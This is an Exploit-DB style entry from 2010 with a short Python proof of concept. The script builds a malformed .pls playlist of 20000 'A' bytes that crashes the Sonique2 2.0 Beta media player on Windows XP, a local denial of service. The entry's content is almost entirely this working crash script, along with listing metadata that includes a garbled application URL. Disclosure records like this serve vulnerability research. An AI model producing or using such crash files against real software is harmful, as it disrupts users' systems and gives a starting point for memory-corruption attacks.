[] NeoSense

Sonique2 2.0 Beta Build 103 - Local Crash (PoC)

Author: b0telh0
type: dos
platform: windows
port: 
date_added: 2010-01-22 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt11500/11234.png 
application_url: http://www.exploit-db.coms2beta_103_install.zip

#!/usr/bin/python
#
# Title: Sonique2 2.0 Beta Build 103 Local Crash PoC
# Found by: b0telh0
# Tested on: Windows XP SP3


crash = "\x41" * 20000

try:
     file = open('b0t.pls','w');
     file.write(crash);
     file.close();
     print "[+] Created b0t.pls file."
except:
     print "[-] Error cant write file to system."